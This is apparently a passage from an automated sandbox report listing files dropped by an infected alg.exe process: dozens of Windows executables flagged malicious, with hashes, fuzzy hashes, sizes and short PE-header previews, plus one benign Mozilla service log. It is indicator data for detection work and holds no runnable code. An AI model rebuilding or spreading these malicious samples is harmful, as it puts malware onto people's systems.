                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................)............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1287680
                                                                                                                                                Entropy (8bit):5.298513071700569
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:gNmt0LDILi21XXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:PLi4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:385C2A09F7C83B86F2BC9F9C7CF4510E
                                                                                                                                                SHA1:228CF4F74BECA7C4F0DC0B3C1FB37EEC13DC5B94
                                                                                                                                                SHA-256:E7532C16B5EDDAB5CCC9883556AA58C9899907896C8BCCBCC7A3EA6F0C08A02C
                                                                                                                                                SHA-512:1FA7882CB35A3DA9465916E451531D0FD0DE86739D4F3D671C4731FF2EBB897F0BBD0BFB1C18B7BAA51FEF8D076B5FF8FC762E1BDBF013F7F07FB1EAAC7B593B
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................O............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1343488
                                                                                                                                                Entropy (8bit):5.232151150439507
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:pjuozQMGNUbTUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:Rf4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:75E0A8C8836098C821A16E061E0EB63C
                                                                                                                                                SHA1:5246E913EDB17652192FD32410D83EBF7F3C5FA8
                                                                                                                                                SHA-256:43B2D0E150460BD7ED282495A7D9A0D60D85C7C5204D701711C3F16F7D16818D
                                                                                                                                                SHA-512:888EFAD64E76A0B6F9A50E6E3AA79F7B7500EC8981F80BEEC0F95CE3438132E645FB2A4379999B87844BCF373A076D8246769117FE9125B22CDCD6CAAC2F0156
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.......................................... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1496064
                                                                                                                                                Entropy (8bit):5.573983617667113
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:UbUO42i/EJsqjnhMgeiCl7G0nehbGZpbD:UJNDmg27RnWGj
                                                                                                                                                MD5:58A674D4247C2A6D38D64C56F8292816
                                                                                                                                                SHA1:D8EEC80D4BFDE016E212CAFDBF1C9982EBB4CAEF
                                                                                                                                                SHA-256:E7C135C74AC0AF98E50594D1454B5048DA8AEE5C4948EAB0E0F64C911AA1B746
                                                                                                                                                SHA-512:23D812F38E0C81BB98A5260FB9393A2EB3098767B69921E56F2E3FCE3738DAE1A6A0F4D9CC5C9AFD573E8DDFC2F236555A9CD59F88887292FBC3F0BF011754A4
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... .......F........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):52712960
                                                                                                                                                Entropy (8bit):7.961801685830636
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1572864:mLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:qicZmsR3Lo/cnLe
                                                                                                                                                MD5:21C32D190F7E0D4CE06260F4168F19D5
                                                                                                                                                SHA1:B3331692EDE65D89A7A31DCB4CC1F88A08EF8FDE
                                                                                                                                                SHA-256:1EC577B69E7814FDFE7647EB4D849618ED90DFD3522096134468C30A234C2E34
                                                                                                                                                SHA-512:9E985C7A718170BB81ADB67129CDE017D8925CFA273E91ABE9BF1F43C8407DD462436765F057220668A8B57393427851D6C3C39EAE3ABD8D59BF6EFA0B19A32B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....h.$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4993536
                                                                                                                                                Entropy (8bit):6.810213444982424
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:ilkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLcD527BWG:0kkCqaE68eV+0ynE6LcVQBWG
                                                                                                                                                MD5:E839E87EC2C0E9869D1F69B45FA8F563
                                                                                                                                                SHA1:638F79017BF4ED0F85C805D70D4A426AAE0C9DE3
                                                                                                                                                SHA-256:130C527591B71F9B18B182443564A989070E990532DBEDEE564758853D5DC5B9
                                                                                                                                                SHA-512:3C459206F5D00E271ECB71698EAC14D522FBB619825A89029E5891383CDF2530B8D6D71ED476BFEF1571E338E2D117132A85E50E478B7DD7F5214DA2F9F8CD18
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL.....'.L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1657344
Entropy (8bit): 5.63515526043391
Encrypted: false
SSDEEP: 24576:mE8DMeflpnIOvYU4sqjnhMgeiCl7G0nehbGZpbD:mtDD9pnIOODmg27RnWGj
MD5: 48CBC829B8FD9DBC732C70D03A0946E8
SHA1: DFD1DD048FF084E441EADA92433D950D18229B6C
SHA-256: 0B97B1DB4A6AC78D82C0ED504B3AD3CC3E27BB34564C2A35D71E217696ED0DF6
SHA-512: F6CCD4E4D32F30A236B91201A9E7268C11482EBC6F2D91F2568BF88E77D841D599AB30B3DB50220C671F9E7C63B20733BAAE81B6B08C33881745B7A86460840F
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4364800
Entropy (8bit): 6.748493619259159
Encrypted: false
SSDEEP: 49152:qB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EdDmg27RnWGj:EHzorVmr2ZkRpdJYolrD527BWG
MD5: 6D45DA866B3E4BC0EB4CE3C16C4EB5D0
SHA1: 9FD22D0762A3809012884C3454E5CB7D2E9C6007
SHA-256: 4AC77A49484E68183E68D3809DB437C0D9695C681F845E4290AD55ADC92599DB
SHA-512: E9D63BA340411C9C9E3431BF8DF9BC4C1D4EDBBF8B32CBB6D53982B8447BBD8F32335347207754F0DB42206902645C23FB7BE079436F1758EEE9CE57D178A0FD
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1238528
Entropy (8bit): 5.146949201384215
Encrypted: false
SSDEEP: 12288:63w1uVdSEjKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:6EyTKsqjnhMgeiCl7G0nehbGZpbD
MD5: F3E7C2B36A563069187035C3ACC28786
SHA1: 5DA8E24A8B450FA87E4FCA7DE49C4468E6BDFF65
SHA-256: 45584328C83BD1EBA20F2C14416395B85195A3C63211EB79EF13D9FAA1D90741
SHA-512: A87D1FF9F2601E5758CE0C61185E5A8DBEAE7202E42B793D02DE770E14E748C27CDC2B5C5313817D367A89FF00E6EAB364060C8915A216E0CB752E9E717A07D8
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2354176
Entropy (8bit): 7.049994809209524
Encrypted: false
SSDEEP: 49152:4hDdVrQ95RW0YEHyWQXE/09Val0GrDmg27RnWGj:4hHYW+HyWKsD527BWG
MD5: 325FCE66CB0133E663D042F034BDE5AF
SHA1: 4B1959EC5D58D90E4200332EA8F512AE32CDC35A
SHA-256: E4213156AE8CD78C109D15A10802CC5D8B85018925E1714794B58D493DAA0811
SHA-512: 1BC3F9DD1FAE57C6C5D2199526A804867E03B0F9C9F0B28C07B770AA00B429C0EAF5B3864DB691F985EFD2440AC5C314C4986632FAC8B38E6C8D598593406FD3
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1825280
Entropy (8bit): 7.158505390765769
Encrypted: false
SSDEEP: 24576:v70E0ZCQZMiU6Rrt9RoctGfmddJsqjnhMgeiCl7G0nehbGZpbD:D0EzQSyRPRoc1RDmg27RnWGj
MD5: 46963946E056E08693AB0C65CA548C55
SHA1: BA2DDBEDC16AA75CB22011E8582F86CC8D90B34D
SHA-256: 094A9F6D8ED3BC775BF93EE252AE88E1A6E400FCA30BC6790DC71FAB25E577B8
SHA-512: 83001758C90EC9F362DE838BF1DAC0D94BDC7CFB2ADE9FD64058F5F8814D7C50E69902F4DF221CAB093743CB7A8E72B48320B7194FBE427CD36BD19D0F593178
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1847808
Entropy (8bit): 7.145507204111395
Encrypted: false
SSDEEP: 24576:xiD2VmA1YXwHwlklb8boUuWPg2gmsqjnhMgeiCl7G0nehbGZpbD:QD2VmAyiwIb8boQ9Dmg27RnWGj
MD5: CEFC974E2C85DDF71D709090DC59BA5A
SHA1: 0623C9FFF6F5A0331CE35BDE627461E6E1F25FFC
SHA-256: 62C0358AB9073CBA3BD056DD4B9650964BE961FDBE570392E1391C0ABFA15512
SHA-512: 9C9B9F8A46EE1514278258BD5081F64E6A84506ECDE778001DDD0401AD69C0A8A262C9E8035F568E16285AE931ED1ADBD4632E648421AAD9E3D73E300ED37B9C
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2853376
Entropy (8bit): 6.9507667288300325
Encrypted: false
SSDEEP: 49152:OfD3zO9ZhBGloizM3HRNr00lDmg27RnWGj:0DaalxzM00lD527BWG
MD5: FC4653050C83F4EDBE95E15C027EAA60
SHA1: A7072C694CDC516565FCDC6F77F63E5F65DD9363
SHA-256: E536BC7768C8DD996A784A97F60816A0AC6A34477F1ED67B40D1481680F00C7C
SHA-512: 2A6A74BFE59B45EEC2543CC7C040A242B6E978C3B12BB9586580D61DB2F2321515681AA6196D22108FEAF50C108D0EF6478645A3983C12612F8B3FDF25FF0C2D
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4320256
Entropy (8bit): 6.824632926917932
Encrypted: false
SSDEEP: 49152:aTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhGDmg27RnN:1I72LvkrDpbxJRoIMND527BWG
MD5: 8A7CF958323148E7E580E2724C987A4C
SHA1: E057844B0087CC66CCEE49E8940C18DE980A12B3
SHA-256: B74DA0E046C1775662B5C9978E8589C70A60ED267C02799CD9102A0EDDBDBC9F
SHA-512: DF7315650258FEC2FC870507974F2B07A504A525FC5E9FC656A48EA19525C7C886C7745B7AF3DA940C73B6B9408EB610C4A6612CE128755FE3E97A9D6BCD7DE6
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2062336
Entropy (8bit): 7.097259548321264
Encrypted: false
SSDEEP: 24576:BW9Jml9mmijviMnF+ZxmQWcbLw8VZsqjnhMgeiCl7G0nehbGZpbD:BWnm5iOMkjmQWkVdDmg27RnWGj
MD5: A1107F79091FE74FA4845CD181DBDE8D
SHA1: 5AA188E99F2F4AB314C0413B9F545F2D84C25FD0
SHA-256: BF199CAC1704F53FC88C4054354859F99C6F5E3A517EE9DBC58E67F224FA0557
SHA-512: 4146E035CCBE2CFB96F88ECDB54CE7EA23CF1CE7E7994ABDE7BDB86E17F2A965BB4E23DA596845F484222F025CF393BF0B6F3237749901159B8382F2C3BB49AB
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1801216
Entropy (8bit): 7.166388926561532
Encrypted: false
SSDEEP: 24576:7wNHwoYhua6MtjRO4qbBJTY6mY1uIgfsqjnhMgeiCl7G0nehbGZpbD:7wNPdQO7BJTfmEcDmg27RnWGj
MD5: 68CC0D3B2EEED8D957EE013A45A98139
SHA1: A8B0FA3FEC595723A9E7440FE7CCE3712F71C528
SHA-256: 702726E75C0E8AC9A501DB9674B15F43286728A6D429510B2933D9E88BDC6B3B
SHA-512: AC0160028CB405A9C48F6FEBED6C9F36A3D6BEC5B1D1C674461B954F11EBAEC5EE49EECC8C4E67E221F97BF9DEC35E3244193575D74C9F2A9B6B16397C69FD59
Malicious: true
Reputation: unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1847808
                                                                                                                                                Entropy (8bit):7.145492291823538
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:eiD2VmA1YXwHwlklb8boUuWPg2gmsqjnhMgeiCl7G0nehbGZpbD:9D2VmAyiwIb8boQ9Dmg27RnWGj
                                                                                                                                                MD5:EA452DAB7E3584DA1398E81E58B102D7
                                                                                                                                                SHA1:A0E766C320D369D0FBAB9DDD11A05F82396CD790
                                                                                                                                                SHA-256:15A6E496C85BDDEE9F753B9912D5BA488A199D66834CF1D0E695F6FE8E15AA15
                                                                                                                                                SHA-512:EC446B10653152DDCB6CBD4B8FCBB2130FFF2F8ED22E5133CC9346746212AE2A5F8FA4F1F27137969380CBEC6A640F62D646F0A39FA6476BF88E12CC8E3A4134
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1801216
                                                                                                                                                Entropy (8bit):7.166386603609311
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:lwNHwoYhua6MtjRO4qbBJTY6mY1uIgfsqjnhMgeiCl7G0nehbGZpbD:lwNPdQO7BJTfmEcDmg27RnWGj
                                                                                                                                                MD5:F722D0A5325C87DD33AE930664B1B729
                                                                                                                                                SHA1:AEC9B8A37B43B55D8D2910103272DF9D4D811108
                                                                                                                                                SHA-256:F7A864BDF6BA75542FBFAF0D6090E06E8B39755674DBC140ED6D3EA0B35ADAE1
                                                                                                                                                SHA-512:2E209D0B948BCCD42A935851CC8D348468B294510C97F2F5C1198ABF3BE8A8FDC9281BAECBC351427BB4A4D5C4ECB0379AF37A1C62004A2F7FDED9119FD48232
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1325568
                                                                                                                                                Entropy (8bit):5.141860474054029
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:Q4lbht6BHcsqjnhMgeiCl7G0nehbGZpbD:hlNtqHIDmg27RnWGj
                                                                                                                                                MD5:9F4B7527135AC82032593D3E39FD61E7
                                                                                                                                                SHA1:6109F990A37FC5FED5CD146F465A6A2B784B741F
                                                                                                                                                SHA-256:41A26D0EBCD109A8CB9CE5EB6CBC8FFA0116A070C93BCE220E526096E7842D32
                                                                                                                                                SHA-512:ADF6AC2480B7415804684A1F1DF0DD5EAF5EDD242D5C13FADC23D981440C9B474BC9273FC632437C6796C0F5EC9E4C582C3EB7E0BDAC6225742C02C669BAD67B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1221120
                                                                                                                                                Entropy (8bit):5.138870067944305
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:KIkOkTB+wgXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:KIxkTBVgsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:81018C0AAE348DD8722F47301E25381E
                                                                                                                                                SHA1:58574D65DC0848692A08D5ED843A338FDDD8EC8D
                                                                                                                                                SHA-256:166F69901C30DBCA960429FF327A61635B28A2D10C85335A4F9F433BFBA95DEE
                                                                                                                                                SHA-512:D2629615D37E3A505268E999F63AE54E005EB3B12F6DF3BA299679ECB8A15FF5C3EEE7192DEDDD3A352DFF32B5BFCDBEF5E876FD1B9B845BA6B3F9FCC6F90425
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1335296
                                                                                                                                                Entropy (8bit):5.236806434223795
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:X4lssmroC3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:Xcssmr1sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:BDB25DCFD241A54A0ED3FA2597926A21
                                                                                                                                                SHA1:6A01558AF1F5E263E71A3C0E03D8B914D9BD525B
                                                                                                                                                SHA-256:BC57071217819B670575D7A0110E50EAB0B890FD0E206B56414B81E71A5F7611
                                                                                                                                                SHA-512:F0F986B28FA943354806375F3D3F52E064906F7A5A8301C49E4C473BFF5688E0E5432935449100D0CCA0CF917423713C3AC62971464374335BAB97545144460A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1383936
                                                                                                                                                Entropy (8bit):5.338547821610714
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:H03cT++foSBWU2YxhkgisqjnhMgeiCl7G0nehbGZpbD:U3cK+foQWU2YnPmDmg27RnWGj
                                                                                                                                                MD5:2E99DED0AC659C4FC65BC186BA37EAD0
                                                                                                                                                SHA1:3D4CC419E1644932C2295973D7F958952A935313
                                                                                                                                                SHA-256:3FA00BDA2BB449F408A0447547036DC54357F2F316C59503D36435F860E73EDE
                                                                                                                                                SHA-512:87BF521732E40FA6B9EFB623A3A9DB84AA707112C735CE21C815E65C4A09725107A1E51A578D71D3521E0603538314B4A8E329FA07354E3B7D596031493AE3E0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1221120
                                                                                                                                                Entropy (8bit):5.138926649475792
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:qbrNRzB+NCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:qbBRzBgCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:7A32724D43C4BEE8B171BAE859B62A8B
                                                                                                                                                SHA1:CC89FA01C2EA3F5813FF12A7618D77E1B5171E54
                                                                                                                                                SHA-256:C00C716B8DD491DB7E8D00D0BC71928F462C4873F812D808400D86B0341A0526
                                                                                                                                                SHA-512:E32137CE8BA920A2FF6D70705060A8D7BE5B1273417A4A4E15740A433D65DD52DD92224A921461D05FA0589915501B91E56DC3496280FE62AC167A15630A60F9
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2168832
                                                                                                                                                Entropy (8bit):7.940563256134219
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:wy53w24gQu3TPZ2psFkiSqwozEDmg27RnWGj:wyFQgZqsFki+ozED527BWG
                                                                                                                                                MD5:4CF34097512E3DE310EFB2079F715A6D
                                                                                                                                                SHA1:1709FD08839E5DB239A69C50CE46F8EE428468AB
                                                                                                                                                SHA-256:265E2B39FD4256E302B1B3B110736B96F700B30521C1DCF63977D3F2D624C123
                                                                                                                                                SHA-512:A03AFAA720325D6604E857D74D64786CD5002CBF8431A37D57F6D43FC0D4B86B6D427FFB634F7BA9FF222E52CB7DE42F74F710E38AD03A6A80FB01A09D5451AE
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3141
                                                                                                                                                Entropy (8bit):4.861348068330154
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:lQdwurJcV4T9Rz3WtF23WmIFc1+5fuxf3WqF6vjx3WlbF3W07FDlUY3WqNFPw4Es:eSCRKpmBKdLYahq4BdnaD
                                                                                                                                                MD5:AED335C7CDB526910D3E4F1CF0F98B7C
                                                                                                                                                SHA1:680EE8D6BF38288AF520B5F3F678AA50F7316D62
                                                                                                                                                SHA-256:8C463B4AD04A0CAF5D7D25944D863377A7FF201154651E90A62BEDBB70A2F421
                                                                                                                                                SHA-512:39151E186C535768783E9FF648D850C26CA0E591D68CC7C5CA8039E5AFFE0C6BA6308444D6D5AD04D5B55B8F6676362C6A45EAE1A207A6437BD8DF1346839BE7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-02 01:56:09-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-02 01:56:09-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-02 01:56:09-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-02 01:56:0
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1356800
                                                                                                                                                Entropy (8bit):5.3478432767736015
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:bQVTZu0JpsqjnhMgeiCl7G0nehbGZpbD:sVTZucDmg27RnWGj
                                                                                                                                                MD5:FED16854B8EA309A65BF6450ECACF0D0
                                                                                                                                                SHA1:2E6ADB257921FA8FF607728BD7C4D648E435282A
                                                                                                                                                SHA-256:8401EC3450E03F27DD7189AA9526BA27D23478268FDBFF08B49F5E5AE2D7CA34
                                                                                                                                                SHA-512:3A4EB8C17514D2838154E6FE5CE355A655F287632D49C761E9395A4AF7085261BCEBA5EE89D0F97973A7F8014905BCC200C36A68EECD27F5198A95259F9E40AA
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1683968
                                                                                                                                                Entropy (8bit):5.623145715994426
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:M+gkESfh4CoasqjnhMgeiCl7G0nehbGZpbD:JgkE+SoDmg27RnWGj
                                                                                                                                                MD5:231A55BFE35EAB8F38E212D8E8C73A5A
                                                                                                                                                SHA1:5D110A25B3E65717D0BB12BFC4D8E6D195E5F81F
                                                                                                                                                SHA-256:C0FF56F88D3A2E34CF6DC423FC5C1455174A5ADEC7BB11981074AC226919C1CA
                                                                                                                                                SHA-512:88652F24F6516AEE1503C12D7BF94CCA6C8AF404E2AA5279285AA3D05F8C3BB4B1AD825A2744D5DD2E17FA1A4BB0D0B03A95FE8A3191919506F440EE768B626E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1532416
                                                                                                                                                Entropy (8bit):7.0966782759727165
                                                                                                                                                Encrypted:false
